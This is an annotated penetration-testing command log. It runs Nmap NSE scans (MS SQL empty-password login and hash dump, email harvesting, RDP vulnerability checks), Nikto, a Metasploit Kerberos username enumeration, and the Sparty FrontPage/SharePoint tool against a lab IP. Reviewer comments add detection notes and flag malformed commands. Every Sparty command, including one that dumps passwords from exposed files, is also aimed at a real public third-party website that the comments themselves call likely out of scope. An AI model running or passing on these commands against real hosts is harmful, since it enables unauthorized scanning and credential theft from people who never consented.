  1. ##############
  2. # Using Nmap #
  3. ##############
# Every scan in this section is aimed at the single lab address 172.31.43.151.
# Flags reused on most lines: -Pn skips host discovery (ping), -n skips DNS
# resolution, --open prints only open ports, -p limits the scan to one port.
# Baseline service/version detection first; the per-port NSE runs below build
# on what this reports.
  4. sudo nmap -sV 172.31.43.151
  5.  
# Port 1433 (MS SQL, per the ms-sql-* script names): instance info, an
# empty-password login check, and a hash dump that only succeeds if a login
# works. On a monitored host the login attempts land in the SQL Server
# error log / login audit, which is the defender's detection point.
  6. sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.43.151
  7.  
# Port 80: crawls the site collecting e-mail addresses. The two script-args
# bound the crawl (100 pages, depth 10) so it does not walk the whole site.
  8. sudo nmap -Pn -n --open -p80 --script=http-email-harvest --script-args=http-email-harvest.maxpagecount=100,http-email-harvest.maxdepth=10 172.31.43.151
  9.  
# Runs every NSE script whose name starts with "http". This is the noisiest
# option here (it includes intrusive scripts); the exclusion-list variant a
# few lines down is the narrower form of the same idea.
  10. sudo nmap -Pn -n --open -p80 --script=http* 172.31.43.151
  11.  
# Two low-impact single-script checks: page title and response headers.
  12. sudo nmap -Pn -n --open -p80 --script=http-title 172.31.43.151
  13.  
  14. sudo nmap -Pn -n --open -p80 --script=http-headers 172.31.43.151
  15.  
  16.  
# Port 3389 (RDP, per the rdp-* script names): checks for the MS12-020
# condition and enumerates the encryption levels the server offers. The
# vuln check is a probe, not an exploit; a patched host simply reports clean.
  17. sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.43.151
  18.  
# Same as the http* run but with a "not" clause. The leading "+" forces the
# selected scripts to run even where their port rule would not pick them.
# NOTE(review): the comma-separated names inside the boolean expression and
# the trailing comma look malformed for nmap's --script expression syntax --
# confirm nmap actually accepts this before relying on the exclusions (the
# excluded scripts, by name, are ones that presumably call out to third-party
# services, which is why they were singled out).
  19. sudo nmap -Pn -n --open -p80 --script='(+http* and not http-icloud-findmyiphone,http-icloud-sendmsg,http-virustotal,)' 172.31.43.151
  20.  
# Reads the NTLM challenge returned by a path that demands NTLM auth.
# NOTE(review): http-ntlm-info.root is the request *path* (default "/"),
# but here it is given the target IP -- looks like a copy-paste mix-up with
# the target argument; confirm which path on the lab host requires NTLM.
  21. sudo nmap -Pn -n --open -p80 --script http-ntlm-info --script-args http-ntlm-info.root=172.31.43.151
  22.  
  23.  
  24.  
  25.  
  26.  
# Builds a small candidate-username file in $HOME for the Kerberos check
# below (and for the Metasploit module later in this listing). Each line
# appends, so re-running this block duplicates the entries -- delete
# list.txt first if it is re-run.
  27. cd ~
  28. echo bob >> list.txt
  29. echo jim >> list.txt
  30. echo joe >> list.txt
  31. echo tim >> list.txt
  32. echo admin >> list.txt
  33. echo hello >> list.txt
  34. echo rob >> list.txt
  35. echo test >> list.txt
  36. echo aaaaaa >> list.txt
  37. echo larry >> list.txt
  38. echo mario >> list.txt
  39. echo jason >> list.txt
  40. echo john >> list.txt
  41.  
# Port 88 (Kerberos, per the krb5-enum-users arg names). The realm is given
# in lowercase here but as "Domain.Local" in the Metasploit block below;
# check which form the lab KDC expects. Defender's view: each probe is a
# pre-auth request, so failed/unknown-principal events on the KDC for a
# burst of names from one source are the signal.
# NOTE(review): this line passes --script-args but never selects a script
# with --script=, so as written no NSE script consumes these arguments and
# the scan is just a port check.
  42. sudo nmap -Pn -n --open -p88 --script-args krb5-enum-users.realm='domain.local',userdb=list.txt 172.31.43.151
  43.  
  44.  
  45.  
  46. ###############
  47. # Using Nikto #
  48. ###############
# Uses a fixed, locally unpacked Nikto release directory (2.1.1), so the
# scanner version is pinned by the path rather than by a package manager.
  49. cd ~/toolz/nikto-2.1.1
  50.  
# -update fetches plugin/database updates from the Nikto project over the
# network. Presumably unauthenticated for a release this old -- verify the
# download source and what it replaces under the tool directory before
# running it on a machine you care about.
  51. perl nikto.pl -update
  52.  
# -h is the target host. Nikto sends a large volume of requests that WAF
# and IDS signatures commonly recognise, so expect it to be logged.
  53. perl nikto.pl -h 172.31.43.151
  54.  
  55.  
  56.  
  57.  
  58.  
  59. cd ~/toolz/metasploit
  60.  
  61. ./msfconsole
  62.  
  63. use auxiliary/gather/kerberos_enumusers
  64.  
  65. set RHOSTS 172.31.43.151
  66.  
  67. set DOMAIN Domain.Local
  68.  
  69. set USER_FILE /home/strategicsec/list.txt
  70.  
  71. run
  72.  
  73.  
  74.  
  75.  
  76. ################
  77. # Using Sparty #
  78. ################
  79. cd ~/toolz
  80.  
# Pulls the tool straight from a third-party repository at whatever its
# current HEAD is and then executes it. Supply-chain hygiene for a tool
# that runs against your hosts: pin a reviewed revision (e.g.
# `git checkout <REVIEWED_COMMIT>` -- placeholder) and read the script
# before the first run, rather than trusting whatever the branch holds today.
  81. git clone https://github.com/adityaks/sparty.git
  82.  
  83. cd sparty/sparty_v_0.1/
  84.  
  85.  
# The "[*] ..." lines throughout this section are section labels copied
# from the tool's own output style, not shell commands; a shell would try
# to execute "[*]" and fail, so this listing is a command log, not a script.
# The tool is invoked as "python sparty_v_0.1.py" -- a 2017-era script,
# presumably Python 2; confirm the interpreter before running.
  86. [*] Sparty - Usage Parameters and Help !
  87.  
  88. python sparty_v_0.1.py -h
  89.  
  90.  
  91.  
# Fingerprints the FrontPage / SharePoint version from the server's responses.
# NOTE(review): the second URL in this and each following pair is a public
# third-party domain, not the lab host used everywhere else in this listing.
# It reads like a leftover from the tool's own examples -- confirm it is part
# of the engagement scope or drop it from the runbook.
  92. [*] Sharepoint/ Frontpage Version Fingerprinting !
  93.  
  94. python sparty_v_0.1.py -v ms_frontpage -u http://172.31.43.151
  95.  
  96. python sparty_v_0.1.py -v ms_frontpage -u https://www.virginiaaquarium.com/
  97.  
  98.  
# Looks for FrontPage files that should never be reachable over HTTP and
# pulls credentials out of any it finds. For the defender the fix is
# removing / access-restricting the legacy FrontPage Server Extensions
# paths, not just the individual file.
  99. [*] Dumping Passwords from Exposed Files !
  100.  
  101. python sparty_v_0.1.py -d dump -u http://172.31.43.151
  102.  
  103. python sparty_v_0.1.py -d dump -u https://www.virginiaaquarium.com/
  104.  
  105.  
  106.  
  107.  
  108.  
# Checks whether directory listing is enabled on directories the tool
# considers sensitive; listing enabled there is itself the finding.
  109. [*] Indexing Check for Critical Directories !
  110.  
  111. python sparty_v_0.1.py -l list -u http://172.31.43.151
  112.  
  113. python sparty_v_0.1.py -l list -u https://www.virginiaaquarium.com
  114.  
  115.  
  116.  
  117.  
# Access-rights check on the FrontPage _vti_pvt / _vti_bin paths: which of
# them answer without authentication.
  118. [*] Scanning Access Rights on Frontpage Files (_vti_pvt and _vti_bin directories) !
  119.  
  120. python sparty_v_0.1.py -f pvt -u http://172.31.43.151
  121.  
  122. python sparty_v_0.1.py -f pvt -u https://www.virginiaaquarium.com
  123.  
  124.  
  125.  
  126.  
  127.  
# Same idea for the SharePoint forms / layouts / catalogs paths.
  128. [*] Scanning Access Rights on Sharepoint Files (forms, layouts and catalogs directories) !
  129.  
  130. python sparty_v_0.1.py -s layouts -u http://172.31.43.151
  131.  
  132. python sparty_v_0.1.py -s layouts -u https://www.virginiaaquarium.com
  133.  
  134.  
  135.  
  136.  
  137.  
# Enumerates exposed service endpoints. Note the lab host is addressed over
# https here (and in the RPC version check below) but over http everywhere
# else; the earlier nmap lines only probed port 80, so confirm a TLS listener
# actually exists on 172.31.43.151 or these two runs will just fail to connect.
  138. [*] Exposed Services Check !
  139.  
  140. python sparty_v_0.1.py -i services -u https://172.31.43.151
  141.  
  142. python sparty_v_0.1.py -i services -u https://www.virginiaaquarium.com
  143.  
  144.  
  145.  
  146.  
  147.  
  148.  
# FrontPage RPC: version query first, then a listing of the RPC services
# the server advertises. Both are read-only queries of a legacy interface;
# a server that still answers them is the thing to remediate.
  149. [*] Frontpage RPC Querying !
  150.  
  151. python sparty_v_0.1.py -e rpc_version_check -u https://172.31.43.151
  152.  
  153. python sparty_v_0.1.py -e rpc_version_check -u https://www.virginiaaquarium.com
  154.  
  155.  
  156.  
  157.  
  158.  
  159. [*] Frontpage - Service Listing !
  160.  
  161. python sparty_v_0.1.py -e rpc_service_listing -u http://172.31.43.151
  162.  
  163. python sparty_v_0.1.py -e rpc_service_listing -u https://www.virginiaaquarium.com